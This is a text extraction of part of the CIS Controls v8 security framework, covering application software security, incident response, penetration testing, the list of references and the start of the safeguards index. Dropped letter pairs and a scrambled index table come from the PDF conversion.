Larger, or commercial, development teams may also consider a bug bounty program where
individuals are paid for finding flaws in their applica ons. Such a program is best used to
supplement an in-house secure development process and can provide an efficient
mechanism for iden fying classes of vulnerabili es that the process needs to focus on.
Finally, in 2020 NIST® published its Secure So ware Development Framework (SSDF), which
brought together what the industry has learned about so ware security over the past two
decades and created a secure so ware development framework for planning, evalua ng, and
communica ng about so ware security ac vi es. Enterprises acquiring so ware or services
can use this framework to build their security requirements and understand whether a
so ware provider’s development process follows best prac ces. These are some applica on
security resources:
→ SAFECode Applica on Security Addendum – h ps://safecode.org/cis-controls/
→ NIST® SSDF – h ps://csrc.nist.gov/News/2020/mi ga ng-risk-ofso ware-vulns-ssdf
→ The So ware Alliance – h ps://www.bsa.org/reports/updated-bsa-frameworkfor-secure-

so ware → OWASP® – h ps://owasp.org/

Safeguards
16.1 Establish and Maintain a Secure Applica on Applica ons -Protect- ••

Development Process
Establish and maintain a secure applica on development process. In the process, address such items as: secure applica on
design standards, secure coding prac ces, developer training, vulnerability management, security of third-party code, and
applica on security tes ng procedures. Review and update documenta on annually, or when significant enterprise changes
occur that could impact this Safeguard.
16.2 Establish and Maintain a Process to Accept and Address Applica ons -Protect- ••
So ware Vulnerabili es
Establish and maintain a process to accept and address reports of so ware vulnerabili es, including providing a means for
external en es to report. The process is to include such items as: a vulnerability handling policy that iden fies repor ng
process, responsible party for handling vulnerability reports, and a process for intake, assignment, remedia on, and
remedia on tes ng. As part of the process, use a vulnerability tracking system that includes severity ra ngs, and metrics for
measuring ming for iden fica on, analysis, and remedia on of vulnerabili es. Review and update documenta on annually,
or when significant enterprise changes occur that could impact this Safeguard.
Third-party applica on developers need to consider this an externally-facing policy that helps to set expecta ons for outside
stakeholders.
16.3 Perform Root Cause Analysis on Security Vulnerabili es Applica ons -Protect- ••
Perform root cause analysis on security vulnerabili es. When reviewing vulnerabili es, root cause analysis is the task of
evalua ng underlying issues that create vulnerabili es in code, and allows development teams to move beyond just fixing
individual vulnerabili es as they arise.
16.4 Establish and Manage an Inventory of Third-Party Applica ons -Protect- ••

So ware Components
Establish and manage an updated inventory of third-party components used in development, o en referred to as a “bill of
materials,” as well as components slated for future use. This inventory is to include any risks that each third-party
component could pose. Evaluate the list at least monthly to iden fy any changes or updates to these components, and
validate that the component is s ll supported.
16.5 Use Up-to-Date and Trusted Third-Party Applica ons -Protect- ••

So ware Components
Use up-to-date and trusted third-party so ware components. When possible, choose established and proven frameworks
and libraries that provide adequate security. Acquire these components from trusted sources or evaluate the so ware for
vulnerabili es before use.
16.6 Establish and Maintain a Severity Ra ng System and Applica ons -Protect- ••
Process for Applica on Vulnerabili es
Establish and maintain a severity ra ng system and process for applica on vulnerabili es that facilitates priori zing the order
in which discovered vulnerabili es are fixed. This process includes se ng a minimum level of security acceptability for
releasing code or applica ons. Severity ra ngs bring a systema c way of triaging vulnerabili es that improves risk
management and helps ensure the most severe bugs are fixed first. Review and update the system and process annually.
16.7 Use Standard Hardening Configura on Templates for Applica ons -Protect- ••
Applica on Infrastructure
Use standard, industry-recommended hardening configura on templates for applica on infrastructure components.

This includes underlying servers, databases, and web servers, and applies to cloud containers, Pla orm as a Service
(PaaS) components, and SaaS components. Do not allow in-house developed so ware to weaken configura on
hardening.
16.8 Separate Produc on and Non-Produc on Systems Applica ons -Protect- ••

Maintain separate environments for produc on and non-produc on systems.
16.9 Train Developers in Applica on Security Concepts and Applica ons -Protect- ••
Secure Coding
Ensure that all so ware development personnel receive training in wri ng secure code for their specific development
environment and responsibili es. Training can include general security principles and applica on security standard prac ces.
Conduct training at least annually and design in a way to promote security within the development team, and build a culture
of security among the developers.
16.10 Apply Secure Design Principles in Applica on Architectures Applica ons -Protect- ••
Apply secure design principles in applica on architectures. Secure design principles include the concept of least privilege and
enforcing media on to validate every opera on that the user makes, promo ng the concept of “never trust user input.”
Examples include ensuring that explicit error checking is performed and documented for all input, including for size, data
type, and acceptable ranges or formats. Secure design also means minimizing the applica on infrastructure a ack surface,
such as turning off unprotected ports and services, removing unnecessary programs and files, and renaming or removing
default accounts.
16.11 Leverage Ve ed Modules or Services for Applica on Applica ons -Protect- ••

Security Components
Leverage ve ed modules or services for applica on security components, such as iden ty management, encryp on, and
audi ng and logging. Using pla orm features in cri cal security func ons will reduce developers’ workload and minimize the
likelihood of design or implementa on errors. Modern opera ng systems provide effec ve mechanisms for iden fica on,
authen ca on, and authoriza on and make those mechanisms available to applica ons. Use only standardized, currently
accepted, and extensively reviewed encryp on algorithms. Opera ng systems also provide mechanisms to create and
maintain secure audit logs.
16.12 Implement Code-Level Security Checks Applica ons -Protect- •

Apply sta c and dynamic analysis tools within the applica on life cycle to verify that secure coding prac ces are being
followed.
16.13 Conduct Applica on Penetra on Tes ng Applica ons -Protect- •

Conduct applica on penetra on tes ng. For cri cal applica ons, authen cated penetra on tes ng is be er suited to finding
business logic vulnerabili es than code scanning and automated security tes ng. Penetra on tes ng relies on the skill of the
tester to manually manipulate an applica on as an authen cated and unauthen cated user.
16.14 Conduct Threat Modeling Applica ons -Protect- •

Conduct threat modeling. Threat modeling is the process of iden fying and addressing applica on security design flaws
within a design, before code is created. It is conducted through specially trained individuals who evaluate the applica on
design and gauge security risks for each entry point and access level. The goal is to map out the applica on, architecture,
and infrastructure in a structured way to understand its weaknesses.

Incident Response Management
Overview Establish a program to develop and maintain an incident response

capability (e.g., policies, plans, procedures, defined roles, training, and
communica ons) to prepare, detect, and quickly respond to an a ack.

A comprehensive cybersecurity program includes protec ons, detec ons, response, and
recovery capabili es. O en, the final two get overlooked in immature enterprises, or the
response technique to compromised systems is just to re-image them to original state, and
move on. The primary goal of incident response is to iden fy threats on the enterprise,
respond to them before they can spread, and remediate them before they can cause harm.
Without understanding the full scope of an incident, how it happened, and what can be done
to prevent it from happening again, defenders will just be in a perpetual “whack-a-mole”
pa ern.
We cannot expect our protec ons to be effec ve 100% of the me. When an incident occurs,
if an enterprise does not have a documented plan—even with good people—it is almost
impossible to know the right inves ga ve procedures, repor ng, data collec on, management
responsibility, legal protocols, and communica ons strategy that will allow the enterprise to
successfully understand, manage, and recover.
Along with detec on, containment, and eradica on, communica on to stakeholders is key. If
we are to reduce the probability of material impact due to a cyber event, the enterprise’s
leadership must know what poten al impact there could be, so that they can help priori ze
remedia on or restora on decisions that best support the enterprise. These business
decisions could be based on regulatory compliance, disclosure rules, service-level agreements
with partners or customers, revenue, or mission impacts.
Dwell me from when an a ack happens to when it is iden fied can be days, weeks, or
months. The longer the a acker is in the enterprise’s infrastructure, the more embedded they
become and they will develop more ways to maintain persistent access for when they are
eventually discovered. With the rise of ransomware, which is a stable moneymaker for
a ackers, this dwell me is cri cal, especially with modern tac cs of stealing data before
encryp ng it for ransom.
CIS Controls v8 Control 17: Incident Response Management Page 62

Even if an enterprise does not have resources to conduct incident response within an
enterprise, it is s ll cri cal to have a plan. This would include the sources for protec ons and
detec ons, a list of who to call upon for assistance, and communica on plans about how to
convey informa on to leadership, employees, regulators, partners, and customers.
A er defining incident response procedures, the incident response team, or a thirdparty,

should engage in periodic scenario-based training, working through a series of a ack
scenarios fine-tuned to the threats and poten al impacts the enterprise faces. These
scenarios help ensure that enterprise leadership and technical team members understand
their role in the incident response process to help prepare them to handle incidents. It is
inevitable that exercise and training scenarios will iden fy gaps in plans and processes, and
unexpected dependencies, which can then be updated into the plan.
More mature enterprises should include threat intelligence and/or threat hun ng into their
incident response process. This will help the team become more proac ve, iden fying key or
primary a ackers to their enterprise or industry to monitor or search for their TTPs. This will
help focus detec ons and define response procedures to iden fy and remediate more
quickly.
The ac ons in CIS Control 17 provide specific, high-priority steps that can improve enterprise
security, and should be a part of any comprehensive incident and response plan. In addi on,
we recommend the following resource dedicated to this topic:
→ Council of Registered Security Testers (CREST) Cyber Security Incident Response Guide –
h ps://www.crest-approved.org/wp-content/uploads/2014/11/CSIRProcurement-
Guide.pdf. CREST provides guidance, standards, and knowledge on a wide variety of cyber
defense topics.
Safeguards
17.1 Designate Personnel to Manage Incident Handling N/A -Respond- •••

Designate one key person, and at least one backup, who will manage the enterprise’s incident handling process.
Management personnel are responsible for the coordina on and documenta on of incident response and recovery efforts
and can consist of employees internal to the enterprise, third-party vendors, or a hybrid approach. If using a third-party
vendor, designate at least one person internal to the enterprise to oversee any third-party work. Review annually, or when
17.2 Establish and Maintain Contact Informa on for Repor ng N/A -Respond- •••
Security Incidents
Establish and maintain contact informa on for par es that need to be informed of security incidents. Contacts may include
internal staff, third-party vendors, law enforcement, cyber insurance providers, relevant government agencies, Informa on
Sharing and Analysis Center (ISAC) partners, or other stakeholders. Verify contacts annually to ensure that informa on is up-
to-date.
17.3 Establish and Maintain an Enterprise Process for N/A -Respond- •••

Repor ng Incidents
Establish and maintain an enterprise process for the workforce to report security incidents. The process includes repor ng
meframe, personnel to report to, mechanism for repor ng, and the minimum informa on to be reported. Ensure the
process is publicly available to all of the workforce. Review annually, or when significant enterprise changes occur that could
impact this Safeguard.
17.4 Establish and Maintain an Incident Response Process N/A -Respond- ••

Establish and maintain an incident response process that addresses roles and responsibili es, compliance requirements, and
a communica on plan. Review annually, or when significant enterprise changes occur that could impact this Safeguard.
17.5 Assign Key Roles and Responsibili es N/A -Respond- ••

Assign key roles and responsibili es for incident response, including staff from legal, IT, informa on security, facili es, public
rela ons, human resources, incident responders, and analysts, as applicable. Review annually, or when significant enterprise
17.6 Define Mechanisms for Communica ng During N/A -Respond- ••

Incident Response
Determine which primary and secondary mechanisms will be used to communicate and report during a security incident.
Mechanisms can include phone calls, emails, or le ers. Keep in mind that certain mechanisms, such as emails, can be
affected during a security incident. Review annually, or when significant enterprise changes occur that could impact this
Safeguard.
17.7 Conduct Rou ne Incident Response Exercises N/A -Recover- ••

Plan and conduct rou ne incident response exercises and scenarios for key personnel involved in the incident response
process to prepare for responding to real-world incidents. Exercises need to test communica on channels, decision-making,
and workflows. Conduct tes ng on an annual basis, at a minimum.
17.8 Conduct Post-Incident Reviews N/A -Recover- ••

Conduct post-incident reviews. Post-incident reviews help prevent incident recurrence through iden fying lessons learned
and follow-up ac on.
17.9 Establish and Maintain Security Incident Thresholds N/A -Recover- •

Establish and maintain security incident thresholds, including, at a minimum, differen a ng between an incident and an
event. Examples can include: abnormal ac vity, security vulnerability, security weakness, data breach, privacy incident, etc.
Review annually, or when significant enterprise changes occur that could impact this Safeguard.

Penetra on Tes ng
Overview Test the effec veness and resiliency of enterprise assets through
iden fying and exploi ng weaknesses in controls (people, processes,
and technology), and simula ng the objec ves and ac ons of an
a acker.

A successful defensive posture requires a comprehensive program of effec ve policies and
governance, strong technical defenses, combined with appropriate ac on from people.
However, it is rarely perfect. In a complex environment where technology is constantly
evolving and new a acker tradecra appears regularly, enterprises should periodically test
their controls to iden fy gaps and to assess their resiliency. This test may be from external
network, internal network, applica on, system, or device perspec ve. It may include social
engineering of users, or physical access control bypasses.
O en, penetra on tests are performed for specific purposes:

• As a “drama c” demonstra on of an a ack, usually to convince decision-makers of their
enterprise’s weaknesses
• As a means to test the correct opera on of enterprise defenses (“verifica on”)
• To test that the enterprise has built the right defenses in the first place (“valida on”)
Independent penetra on tes ng can provide valuable and objec ve insights about the
existence of vulnerabili es in enterprise assets and humans, and the efficacy of defenses and
mi ga ng controls to protect against adverse impacts to the enterprise. They are part of a
comprehensive, ongoing program of security management and improvement. They can also
reveal process weaknesses, such as incomplete or inconsistent configura on management,
or end-user training.
Penetra on tes ng differs from vulnerability tes ng, described in CIS Control 7. Vulnerability
tes ng just checks for presence of known, insecure enterprise assets, and stops there.
Penetra on tes ng goes further to exploit those weaknesses to see how far an a acker could
get, and what business process or data might be impacted through exploita on of that
vulnerability. This is an important detail, and o en penetra on tes ng and vulnerability
tes ng are incorrectly used interchangeably. Vulnerability tes ng is exclusively automated
CIS Controls v8 Control 18: Penetra on Tes ng Page 65

scanning with some mes manual valida on of false posi ves, whereas penetra on tes ng
requires more human involvement and analysis, some mes supported through the use of
custom tools or scripts. However, vulnerability tes ng is o en a star ng point for a
penetra on test.
Another common term is “Red Team” exercises. These are similar to penetra on tests in that
vulnerabili es are exploited; however, the difference is the focus. Red Teams simulate specific
a acker TTPs to evaluate how an enterprise’s environment would withstand an a ack from a
specific adversary, or category of adversaries.

Penetra on tes ng starts with the reconnaissance of the enterprise and environment, and
scanning to iden fy the vulnerabili es that can be used as entries into the enterprise. It is
important to make sure all enterprise assets are discovered that are in-scope, and not just
rely on a sta c list, which might be outdated or incomplete. Next, vulnerabili es will be
iden fied in these targets. Exploits to these vulnerabili es are executed to demonstrate
specifically how an adversary can either subvert the enterprise’s security goals (e.g., the
protec on of specific sensi ve data) or achieve specific adversarial objec ves (e.g., the
establishment of a covert Command and Control (C2) infrastructure). The results provide
deeper insight, through demonstra on, into the business risks of various vulnerabili es. This
can be against physical access controls, network, system, or applica on layers, and o en
includes social engineering components.
Penetra on tests are expensive, complex, and poten ally introduce their own risks.
Experienced people from reputable vendors must conduct them. Some risks include
unexpected shutdown of systems that might be unstable, exploits that might delete or
corrupt data or configura ons, and the output of a tes ng report that needs to be protected
itself, because it gives step-by-step instruc ons on how to break into the enterprise to target
cri cal assets or data.
Each enterprise should define a clear scope and rules of engagement for penetra on tes ng.
The scope of such projects should include, at a minimum, enterprise assets with the highest
valued informa on and produc on processing func onality. Other lower-value systems may
also be tested to see if they can be used as pivot points to compromise higher-value targets.
The rules of engagement for penetra on test analyses should describe, at a minimum, mes
of day for tes ng, dura on of test(s), and the overall test approach. Only a few people in the
enterprise should know when a penetra on test is performed, and a primary point of contact
in the enterprise should be designated if problems occur. Increasingly popular recently is
having penetra on tests conducted through third-party legal counsel to protect the
penetra on test report from disclosure.
The Safeguards in this CIS Control provide specific, high-priority steps that can improve
enterprise security, and should be a part of any penetra on tes ng. In addi on, we
recommend the use of some of the excellent comprehensive resources dedicated to this topic
to support security test planning, management, and repor ng:
→ OWASP Penetra on Tes ng Methodologies – h ps://www.owasp.org/index.php/

Penetra on_tes ng_methodologies → PCI Security Standards Council –

h ps://www.pcisecuritystandards.org/ documents/Penetra on-Tes ng-Guidance-
v1_1.pdf
Safeguards
18.1 Establish and Maintain a Penetra on Tes ng Program N/A -Iden fy- ••
Establish and maintain a penetra on tes ng program appropriate to the size, complexity, and maturity of the enterprise.
Penetra on tes ng program characteris cs include scope, such as network, web applica on, Applica on Programming
Interface (API), hosted services, and physical premise controls; frequency; limita ons, such as acceptable hours, and excluded
a ack types; point of contact informa on; remedia on, such as how findings will be routed internally; and retrospec ve
requirements.
18.2 Perform Periodic External Penetra on Tests Network -Iden fy- ••

Perform periodic external penetra on tests based on program requirements, no less than annually. External penetra on
tes ng must include enterprise and environmental reconnaissance to detect exploitable informa on. Penetra on tes ng
requires specialized skills and experience and must be conducted through a qualified party. The tes ng may be clear box or
opaque box.
18.3 Remediate Penetra on Test Findings Network -Protect- ••

Remediate penetra on test findings based on the enterprise’s policy for remedia on scope and priori za on.
18.4 Validate Security Measures Network -Protect- •

Validate security measures a er each penetra on test. If deemed necessary, modify rulesets and capabili es to detect the
techniques used during tes ng.
18.5 Perform Periodic Internal Penetra on Tests N/A -Iden fy- •

Perform periodic internal penetra on tests based on program requirements, no less than annually. The tes ng may be clear
box or opaque box.

Appendix A
Resources and References

CIS Benchmarks™ – h p://www.cisecurity.org/cis-benchmarks/ CIS Controls Cloud Companion
CIS Community Defense Model (CDM) – h ps://www.cisecurity.org/controls/v8/ CIS
Configura on Assessment Tool (CIS-CAT®) – h ps://learn.cisecurity.org/cis-cat/
CIS Controls Assessment Specifica on – h ps://controls-assessment-specifica on.

readthedocs.io/en/latest/ CIS Controls Implementa on Groups –
CIS Controls Industrial Control Systems Implementa on Guide – h ps://www.cisecurity.

org/controls/v8/
CIS Controls Internet of Things Companion Guide – h ps://www.cisecurity.org/ controls/v8/
CIS Controls Mobile Companion Guide – h ps://www.cisecurity.org/controls/v8/ CIS Controls Self

Assessment Tool (CSAT) – h ps://www.cisecurity.org/controls/ciscontrols-self-assessment-
tool-cis-csat/ CIS Controls Telework and Small Office Network Security Guide – h ps://www.
cisecurity.org/white-papers/cis-controls-telework-and-small-office-networksecurity-guide/
CIS Password Policy Guide – h ps://www.cisecurity.org/white-papers/cis-passwordpolicy-
guide/ CIS Risk Assessment Method (RAM) – h ps://www.cisecurity.org/controls/v8/ Cloud
Security Alliance (CSA) – h ps://cloudsecurityalliance.org/
Council of Registered Security Testers (CREST) Cyber Security Incident Response Guide – CREST
provides guidance, standards, and knowledge on a wide variety of cyber defense topics.
h ps://www.crest-approved.org/wp-content/uploads/2014/11/CSIRProcurement-
Guide.pdf
EDUCAUSE – h ps://www.educause.edu/focus-areas-and-ini a ves/policy-

andsecurity/cybersecurity-program/awareness-campaigns
Interna onal Organiza on for Standardiza on – h ps://www.iso.org/home.html
Na onal Cyber Security Alliance (NCSA) – h ps://staysafeonline.org/
Appendix A: Resources and References

Na onal Cyber Security Centre (U.K.) – h ps://www.ncsc.gov.uk/guidance/10-stepsuser-
educa on-and-awareness
Na onal Ins tute of Standards and Technology (NIST®) – h ps://www.nist.gov/
Na onal Ins tute of Standards and Technology (NIST®) SSDF – h ps://csrc.nist.gov/

News/2020/mi ga ng-risk-of-so ware-vulns-ssdf
CIS Controls v8 Page A1

Na onal Ins tute of Standards and Technology (NIST®) Na onal Checklist Program
Repository – h ps://nvd.nist.gov/ncp/repository
Na onal Ins tute of Standards and Technology (NIST®) Digital Iden ty Guidelines –
h ps://pages.nist.gov/800-63-3/
Na onal Ins tute of Standards and Technology (NIST®) FIPS 140-2 – h ps://nvlpubs.nist.
gov/nistpubs/FIPS/NIST.FIPS.140-2.pdf
Na onal Ins tute of Standards and Technology (NIST®) FIPS 140-3 – h ps://nvlpubs.nist.
gov/nistpubs/FIPS/NIST.FIPS.140-3.pdf
Na onal Ins tute of Standards and Technology (NIST®) SP 800-50 Infosec Awareness
Training – h ps://nvlpubs.nist.gov/nistpubs/Legacy/SP/
nistspecialpublica on800-50.pdf
Na onal Ins tute of Standards and Technology (NIST®) SP 800-88r1—Guidelines for

Media Sani za on – h ps://nvlpubs.nist.gov/nistpubs/SpecialPublica ons/NIST. SP.800-
88r1.pdf
Na onal Ins tute of Standards and Technology (NIST®) SP 800-126r3 The Technical Specifica on for the
Security Content Automa on Protocol (SCAP) – h ps://nvlpubs.
nist.gov/nistpubs/SpecialPublica ons/NIST.SP.800-126r3.pdf
OWASP® – h ps://owasp.org/ OWASP® Penetra on Tes ng Methodologies –

h ps://www.owasp.org/index.php/ Penetra on_tes ng_methodologies PCI Security
Standards Council – h ps://www.pcisecuritystandards.org/documents/ Penetra on-Tes ng-
Guidance-v1_1.pdf
SAFECode Applica on Security Addendum – h ps://safecode.org/cis-controls/
SANS – h ps://www.sans.org/security-awareness-training/resources
The So ware Alliance – h ps://www.bsa.org/reports/updated-bsa-framework-forsecure-

so ware Verizon Data Breach Inves ga ons Report – h ps://enterprise.verizon.com/resources/
reports/2020-data-breach-inves ga ons-report.pdf
CIS Controls v8 Appendix A: Resources and References Page
A2
CIS Controls v8 Page A3
Appendix B Controls and Safeguards
Index
Control 01 / Safeguard 1.1 — Control 02 / Safeguard 2.3
SAFEGUARD TITLE/ ASSET TYPE SECURITY IG1 IG2 IG3
CONTROL
NUMBERDESCRIPTION FUNCTION
01 Inventory and Control of Enterprise Assets

Ac vely manage (inventory, track, and correct) all enterprise assets (end-user devices, including portable and mobile; network devices; noncompu ng/Internet of
Things (IoT) devices; and servers) connected to the infrastructure physically, virtually, remotely, and those within cloud environments, to accurately know the totality of
assets that need to be monitored and protected within the enterprise. This will also support iden fying unauthorized and unmanaged assets to remove or remediate. •
•• 1.1 Establish and Maintain Detailed Enterprise Asset Inventory Devices -Iden fy-
Establish and maintain an accurate, detailed, and up-to-date inventory of all enterprise assets with the poten al to store or process data, to
include: end-user devices (including portable and mobile), network devices, non-compu ng/IoT devices, and servers. Ensure the inventory records
the network address (if sta c), hardware address, machine name, data asset owner, department for each asset, and whether the asset has been
approved to connect to the network. For mobile end-user devices, MDM type tools can support this process, where appropriate. This inventory
includes assets connected to the infrastructure physically, virtually, remotely, and those within cloud environments. Addi onally, it includes assets
1.2 Address Unauthorized Assets Devices -Respond -
that are regularly connected to the enterprise’s network infrastructure, even if they are not under control of the enterprise. Review and update
•••
the inventory of all enterprise assets bi-annually, or more frequently.
Ensure that a process exists to address unauthorized assets on a weekly basis. The enterprise may choose to remove the asset from the network,
1.3 U lize an Ac ve Discovery Tool Devices -Detect-
deny the asset from connec ng remotely to the network, or quaran ne the asset. ••
U lize an ac ve discovery tool to iden fy assets connected to the enterprise’s network. Configure the ac ve discovery tool to execute daily, or
more frequently.
1.4 Use Dynamic Host Configura on Protocol (DHCP) Logging to Update Devices -Iden fy-
Enterprise
Asset
Inventory
••
1.5 Use a Passive Asset Discovery Tool Devices -Detect-
CIS Controls v8 Appendix B: Controls and Safeguards Index Page B1

•
ASSET TYPE SECURITY IG1 IG2 IG3
FUNCTION
• •
Use a passive discovery tool to iden fy assets connected to the enterprise’s network. Review and use scans to update the ent
inventory at least weekly, or more frequently.
Use DHCP logging on all DHCP servers or Internet Protocol (IP) address management tools to update the enterprise’s asset inventory. Review and use
logs to update the enterprise’s asset inventory weekly, or more frequently. •
02 Inventory and Control of So ware Assets

Ac vely manage (inventory, track, and correct) all so ware (opera ng systems and applica ons) on the network so that only authorized so ware is installed and can
execute,
and that
2.1 Establish and Maintain a So ware Inventory Applica ons -Iden fy-
unauthorized and unmanaged so ware is found and prevented from installa on or execu on. •••
Establish and maintain a detailed inventory of all licensed so ware installed on enterprise assets. The so ware inventory must document the tle,
publisher, ini al install/use date, and business purpose for each entry; where appropriate, include the Uniform Resource Locator (URL), app
store(s), version(s), deployment mechanism, and decommission date. Review and update the so ware inventory bi-annually, or more frequently.
2.2 Ensure Authorized So ware is Currently Supported Applica ons -Iden fy-
•••
Ensure that only currently supported so ware is designated as authorized in the so ware inventory for enterprise assets. If so ware is
unsupported, yet necessary for the fulfillment of the enterprise’s mission, document an excep on detailing mi ga ng controls and residual risk
acceptance. For any unsupported so ware without an excep on documenta on, designate as unauthorized. Review the so ware list to verify
2.3 Address Unauthorized So ware Applica ons -Respond -
so ware support at least monthly, or more frequently. •••

Ensure that unauthorized so ware is either removed from use on enterprise assets or receives a documented excep on. Review monthly, or more
frequently.
CONTROLSAFEGUARDNUMBER TITLE/ DESCRIPTION
2.4 U lize Automated So ware Inventory Tools Applica ons -Detect-

•
FUNCTION
• •
2.5 Allowlist Authorized So ware Applica ons -Protect-
U lize so ware inventory tools, when possible, throughout the enterprise to automate the discovery and documenta on of installed so ware.
•
Use technical controls, such as applica on allowlis ng, to ensure that only authorized so ware can execute or be accessed.
2.6 Allowlist Authorized Libraries Applica ons -Protect-
Reassess bi-annually, or more frequently. ••

Use technical controls to ensure that only authorized so ware libraries, such as specific .dll, .ocx, .so, etc., files are allowed to load into a system
2.7 Allowlist Authorized Scripts Applica ons -Protect-

Use technical controls, such as digital signatures and version control, to ensure that only authorized scripts, such as speci
allowed to execute. Block unauthorized scripts from execu ng. Reassess bi
process. Block unauthorized libraries from loading into a system process. Reassess bi-annually, or more frequently. •
03 Data Protec on
Develop processes and technical controls to iden fy, classify, securely handle, retain, and dispose of data.
3.1 Establish and Maintain a Data Management Process Data -Iden fy- •••
Establish and maintain a data management process. In the process, address data sensi vity, data owner, handling of data, data reten on limits,
and disposal requirements, based on sensi vity and reten on standards for the enterprise. Review and update documenta on annually, or when
3.2 Establish and Maintain a Data Inventory Data -Iden fy- •••
Establish and maintain a data inventory, based on the enterprise’s data management process. Inventory sensi ve data, at a minimum. Review and
update inventory annually, at a minimum, with a priority on sensi ve data.
3.3 Configure Data Access Control Lists Data -Protect- •••

Configure data access control lists based on a user’s need to know. Apply data access control lists, also known as access permissions, to local and
remote file systems, databases, and applica ons.

•
3.4
Enforce Data ASSET TYPE SECURITY IG1 IG2 IG3
Reten on Data FUNCTION
-Protect-
••• • •
Retain data according to the enterprise’s data management process. Data reten on must include both minimum and maximum melines.
3.5 Securely Dispose of Data Data -Protect- •••

Securely dispose of data as outlined in the enterprise’s data management process. Ensure the disposal process and method are commensurate
with the data sensi vity.
3.6 Encrypt Data on End-User Devices Devices -Protect- •••

Encrypt data on end-user devices containing sensi ve data. Example implementa ons can include: Windows BitLocker®, Apple FileVault®, Linux®
dm-crypt.
3.7 Establish and Maintain a Data Classifica on Scheme Data -Iden fy- ••
Establish and maintain an overall data classifica on scheme for the enterprise. Enterprises may use labels, such as “Sensi ve,” “Confiden al,” and
“Public,” and classify their data according to those labels. Review and update the classifica on scheme annually, or when significant enterprise
Document data flows. Data flow documenta on includes service provider data flows and should be based on the enterprise’s data management
process. Review and update documenta on annually, or when significant enterprise changes occur that could impact this Safeguard.
3.10 Encrypt Sensi ve Data in Transit Data -Protect-
Encrypt sensi ve data in transit. Example implementa ons can include: Transport Layer Security (TLS) and Open Secure Shell (OpenSSH). •
3.11 Encrypt Sensi ve Data at Rest Data -Protect-
3.12 Segment Data Processing and Storage Based on Sensi vity Network -Protect-
Encrypt sensi ve data at rest on servers, applica ons, and databases containing sensi ve data. Storage-layer encryp on, also known as server-side
encryp on, meets the minimum requirement of this Safeguard. Addi onal encryp on methods may include applica onlayer encryp on, also
known as client-side encryp on, where access to the data storage device(s) does not permit access to the plain-text data. ••
3.13 Deploy a Data Loss Preven on Solu on Data -Protect-

•
FUNCTION
• •
Segment data processing and storage based on the sensi vity of the data. Do not process sensi ve data on enterprise assets intended for lower
sensi vity data. •

Implement an automated tool, such as a host-based Data Loss Preven on (DLP) tool to iden fy all sensi ve data stored, processed, or transmi ed
through enterprise assets, including those located onsite or at a remote service provider, and update the enterprise’s sensi ve data inventory. •
3.14 Log Sensi ve Data Access Data -Detect-
Log sensi ve data access, including modifica on and disposal.
04 Secure Configura on of Enterprise Assets and So ware

Establish and maintain the secure configura on of enterprise assets (end-user devices, including portable and mobile; network devices; noncompu ng/IoT devices; and
servers)
and
so ware 4.1 Establish and Maintain a Secure Configura on Process Applica ons -Protect-
(opera ng
systems
and
applica ons). •••

Establish and maintain a secure configura on process for enterprise assets (end-user devices, including portable and mobile, noncompu ng/IoT
devices, and servers) and so ware (opera ng systems and applica ons). Review and update documenta on annually, or when significant
enterprise changes occur that could impact this Safeguard.
4.2 Establish and Maintain a Secure Configura on Process for Network Network -Protect-
Infrastructure •••
Establish and maintain a secure configura on process for network devices. Review and update documenta on annually, or when significant
4.3 Configure Automa c Session Locking on Enterprise Assets Users -Protect-
enterprise changes occur that could impact this Safeguard. •••

Configure automa c session locking on enterprise assets a er a defined period of inac vity. For general purpose opera ng systems, the period
4.4 Implement and Manage a Firewall on Servers Devices -Protect-
must not exceed 15 minutes. For mobile end-user devices, the period must not exceed 2 minutes. •••

•
Implement and manage a firewall on servers, where supported. Example implementa ons include a virtual firewall, opera ng system firewall, or a
FUNCTION
• •
4.5 Implement and Manage a Firewall on End-User Devices Devices -Protect-
third-party firewall agent.•••

Implement and manage a host-based firewall or port-filtering tool on end-user devices, with a default-deny rule that drops all traffic except those
4.6 Securely Manage Enterprise Assets and So ware Network -Protect-
•••
services and ports that are explicitly allowed.
Securely manage enterprise assets and so ware. Example implementa ons include managing configura on through version-
controlledinfrastructure-as-code and accessing administra ve interfaces over secure network protocols, such as Secure Shell (SSH) and Hypertext
Transfer Protocol Secure (HTTPS). Do not use insecure management protocols, such as Telnet (Teletype Network) and HTTP, unless opera onally
4.7 Manage Default Accounts on Enterprise Assets and So ware Users -Protect-
essen al. •••

Manage default accounts on enterprise assets and so ware, such as root, administrator, and other pre-configured vendor accounts. Example
implementa ons can include: disabling default accounts or making them unusable.
4.8 Uninstall or Disable Unnecessary Services on Enterprise Assets and So ware Devices -Protect-
Uninstall or disable unnecessary services on enterprise assets and so ware, such as an unused file sharing service, web applica on module, or
4.9 Configure Trusted DNS Servers on Enterprise Assets Devices -Protect-
service func on. •

Configure trusted DNS servers on enterprise assets. Example implementa ons include: configuring assets to use enterprise-controlled DNS servers
4.10 Enforce Automa c Device Lockout on Portable End-User Devices Devices -Respond -
and/or reputable externally accessible DNS servers. ••

•
Enforce automa c device lockout following a predetermined threshold of local failed authen ca on a empts on portable end-user devices, where
FUNCTION
• •
4.11 Enforce Remote Wipe Capability on Portable End-User Devices Devices -Protect-
supported. For laptops, do not allow more than 20 failed authen ca on a empts; for tablets and smartphones, no more than 10 failed
authen ca on a empts. Example implementa ons include Microso ® InTune Device Lock and Apple® Configura on Profile maxFailedA empts.
••
Remotely wipe enterprise data from enterprise-owned portable end-user devices when deemed appropriate such as lost or stolen devices, or when
4.12 Separate Enterprise Workspaces on Mobile End-User Devices Devices -Protect-
an individual no longer supports the enterprise. •

Ensure separate enterprise workspaces are used on mobile end-user devices, where supported. Example implementa ons include using an
Apple® Configura on Profile or Android™ Work Profile to separate enterprise applica ons and data from personal applica ons and data.
05 Account Management
Use processes and tools to assign and manage authoriza on to creden als for user accounts, including administrator accounts, as well as service accounts, to enterprise
assets and
so ware.
5.1 Establish and Maintain an Inventory of Accounts Users -Iden fy-
•••
Establish and maintain an inventory of all accounts managed in the enterprise. The inventory must include both user and administrator accounts.
The inventory, at a minimum, should contain the person’s name, username, start/stop dates, and department. Validate that all ac ve accounts are
5.2 Use Unique Passwords Users -Protect-
authorized, on a recurring schedule at a minimum quarterly, or more frequently. •••

Use unique passwords for all enterprise assets. Best prac ce implementa on includes, at a minimum, an 8-character password for accounts using
5.3 Disable Dormant Accounts Users -Respond -
MFA and a 14-character password for accounts not using MFA. •••
5.4 Restrict Administrator Privileges to Dedicated Administrator Accounts Users -Protect-
Delete or disable any dormant accounts a er a period of 45 days of inac vity, where supported. •••

•
